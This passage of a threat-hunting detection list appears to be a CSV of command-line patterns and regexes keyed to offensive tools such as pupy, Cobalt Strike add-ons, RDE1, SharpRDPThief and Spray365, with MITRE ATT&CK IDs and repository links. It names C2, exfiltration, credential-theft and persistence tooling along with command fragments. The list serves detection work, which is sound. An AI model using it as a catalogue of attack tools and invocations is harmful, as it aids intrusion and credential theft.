Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* pupyx64.exe*",".{0,1000}\spupyx64\.exe.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* pupyx64.lin*",".{0,1000}\spupyx64\.lin.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* pupyx86.exe*",".{0,1000}\spupyx86\.exe.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* push_payload*",".{0,1000}\spush_payload.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* putterpanda.py*",".{0,1000}\sputterpanda\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "* pwcrack.sh*",".{0,1000}\spwcrack\.sh.{0,1000}","offensive_tool_keyword","nsa-rules","Password cracking rules and masks for hashcat that I generated from cracked passwords.","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/NSAKEY/nsa-rules","1","0","N/A","10","6","513","124","2017-01-03T11:53:25Z","2016-02-15T20:49:32Z" "* pwn_php.me*",".{0,1000}\spwn_php\.me.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","9","4","359","72","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "* pwn_python.me*",".{0,1000}\spwn_python\.me.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable 
files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","9","4","359","72","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z" "* Pwn3d!*",".{0,1000}\sPwn3d!.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* pyasn1 *",".{0,1000}\spyasn1\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "* 
pyasn1.*",".{0,1000}\spyasn1\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "* PyClone.py*",".{0,1000}\sPyClone\.py.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "* pyLAPS.py*",".{0,1000}\spyLAPS\.py.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","0","N/A","9","1","60","11","2024-03-31T12:13:57Z","2021-10-05T18:35:21Z" "* 
pypykatz*",".{0,1000}\spypykatz.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "* pyramid.py *",".{0,1000}\spyramid\.py\s.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "* pyrdp.mitm.*",".{0,1000}\spyrdp\.mitm\..{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "* python goldenPac *",".{0,1000}\spython\sgoldenPac\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "* pywsus.py *",".{0,1000}\spywsus\.py\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -q -r karma.rc_.txt*",".{0,1000}\s\-q\s\-r\skarma\.rc_\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* qconn-exec.nse*",".{0,1000}\sqconn\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* qscan.nse*",".{0,1000}\sqscan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* quake1-info.nse*",".{0,1000}\squake1\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* quake3-info.nse*",".{0,1000}\squake3\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* quake3-master-getservers.nse*",".{0,1000}\squake3\-master\-getservers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* QuickViewAD.ps1*",".{0,1000}\sQuickViewAD\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "* -r data/* -p * -m readfiles*portscan*",".{0,1000}\s\-r\sdata\/.{0,1000}\s\-p\s.{0,1000}\s\-m\sreadfiles.{0,1000}portscan.{0,1000}","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/swisskyrepo/SSRFmap","1","0","N/A","N/A","10","2756","484","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" "* radare *:* -ble*",".{0,1000}\sradare\s.{0,1000}\:.{0,1000}\s\-ble.{0,1000}","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Network Exploitation tools","https://github.com/souravbaghz/RadareEye","1","0","N/A","N/A","4","351","52","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z" "* RagingRotator.go*",".{0,1000}\sRagingRotator\.go.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090","TA0006 - TA0005 - TA0001","N/A","N/A","Credential 
Access","https://github.com/nickzer0/RagingRotator","1","0","N/A","10","1","74","5","2024-02-05T21:46:54Z","2023-09-01T15:19:38Z" "* rai-attack-dns*",".{0,1000}\srai\-attack\-dns.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "* rai-attack-http*",".{0,1000}\srai\-attack\-http.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "* --random_user_agent*",".{0,1000}\s\-\-random_user_agent.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "* --random-agent *",".{0,1000}\s\-\-random\-agent\s.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* rarce.py*",".{0,1000}\srarce\.py.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "* rasman.exe*",".{0,1000}\srasman\.exe.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - 
TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "* -ratel *",".{0,1000}\s\-ratel\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* Rattler.exe*",".{0,1000}\sRattler\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "* Rattler_32.exe*",".{0,1000}\sRattler_32\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "* Rattler_x64.exe*",".{0,1000}\sRattler_x64\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "* RBCD -action write -delegate-to * -delegate-from *",".{0,1000}\sRBCD\s\-action\swrite\s\-delegate\-to\s.{0,1000}\s\-delegate\-from\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - 
TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "* rce.php /var*",".{0,1000}\srce\.php\s\/var.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "* RCE.py -*",".{0,1000}\sRCE\.py\s\-.{0,1000}","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Network Exploitation Tools","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rde1 crde_windows*",".{0,1000}\srde1\scrde_windows.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* rde1 srde_linux*",".{0,1000}\srde1\ssrde_linux.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* rde1 
srde_macos*",".{0,1000}\srde1\ssrde_macos.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* rde1 srde_windows*",".{0,1000}\srde1\ssrde_windows.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "* rdp * -u * -p * --nla-screenshot*",".{0,1000}\srdp\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-nla\-screenshot.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* rdp-enum-encryption.nse*",".{0,1000}\srdp\-enum\-encryption\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* RDPHook.dll*",".{0,1000}\sRDPHook\.dll.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","10","2","154","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z" "* rdp-ntlm-info.nse*",".{0,1000}\srdp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rdpv.exe*",".{0,1000}\srdpv\.exe.{0,1000}","offensive_tool_keyword","rdpv","Remote Desktop PassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "* rdp-vuln-ms12-020.nse*",".{0,1000}\srdp\-vuln\-ms12\-020\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
